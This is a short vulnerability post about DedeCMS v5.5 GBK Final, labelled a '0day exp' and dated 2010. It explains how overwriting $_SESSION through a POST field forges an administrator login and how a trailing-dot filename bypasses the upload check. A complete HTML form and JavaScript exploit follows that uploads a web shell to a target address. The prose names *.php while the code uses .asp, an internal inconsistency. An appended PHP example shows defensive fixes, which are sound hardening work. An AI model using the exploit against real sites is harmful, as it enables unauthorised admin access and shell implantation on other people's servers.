A low-value vulnerability in DedeCMS v5.5 GBK Final

When session.auto_start is enabled, the $_SESSION variable can be overwritten with arbitrary values, so we can forge an administrator login and upload files through
/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php
When uploading, rename the file to *.php.
This bypasses the check and uploads a shell.
Exploit:
<form action="" method="POST" enctype="multipart/form-data">
    U R L: <input type="text" name="target" size="50" value="http://192.168.1.110">
    Path: <input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br>
    File: <input type="file" name="uploadfile" size="25" /> (Filetype must be GIF/JPEG etc)
    RenameTo: <input type="text" name="newname" value="shell.asp." /><br>

    <!-- overwrites $_SESSION['dede_admin_id'] on the server when session.auto_start is on -->
    <input type="hidden" name="_SESSION[dede_admin_id]" value="1">
    <!-- filled in by fsubmit(): the URL the script redirects to after the upload -->
    <input type="hidden" name="bkurl" value="1">
    <input type="button" value="submit" onclick="fsubmit()" /><br><br><br><br><br><br>
    dedecms 0day exp..<br>
    need: session.auto_start = 1<br>
    By toby57        2010/2/22
</form>
<script>
function fsubmit() {
    var form = document.forms[0];
    // post to the target host + the upload script path
    form.action = form.target.value + form.path.value;
    // bkurl is the new file's URL with the trailing dot removed
    var tmpstr = form.target.value + '/' + form.newname.value;
    form.bkurl.value = tmpstr.substr(0, tmpstr.length - 1);
    form.submit();
}
</script>
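As an added, defender-side example (not DedeCMS code and not part of the original post), these are the two server-side checks that close the hole described above: refusing request keys that name a superglobal, and normalising the upload name before an extension allow-list check. The function names and the allow-list are assumptions.

```php
<?php
// Added hardening example; function names and allow-list are assumptions.

// 1. Refuse request keys that would overwrite a superglobal such as $_SESSION
//    when an application copies $_GET/$_POST keys into variables.
function reject_superglobal_keys(array $request): void
{
    foreach (array_keys($request) as $key) {
        if (preg_match('/^(GLOBALS|_SERVER|_GET|_POST|_COOKIE|_FILES|_ENV|_REQUEST|_SESSION)$/i', (string) $key)) {
            http_response_code(400);
            exit('Request var not allowed');
        }
    }
}

// 2. Normalise an upload name the way the target filesystem will, then check
//    the real extension. NTFS silently drops trailing dots and spaces, so a
//    name like "x.php." is stored as "x.php"; strip them before checking.
function safe_upload_name(string $name, array $allowed): ?string
{
    $base = basename(str_replace('\\', '/', $name));  // drop any path part
    $base = rtrim($base, ". ");                        // NTFS normalisation
    if ($base === '' || strpos($base, "\0") !== false) {
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null;
    }
    // Never reuse the client-supplied name: keep only the vetted extension.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Usage at the top of an upload handler
reject_superglobal_keys($_POST);
$allowed = ['gif', 'jpg', 'jpeg', 'png'];
$stored = safe_upload_name($_FILES['uploadfile']['name'] ?? '', $allowed);
if ($stored === null) {
    http_response_code(400);
    exit('Upload type not allowed');
}
```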
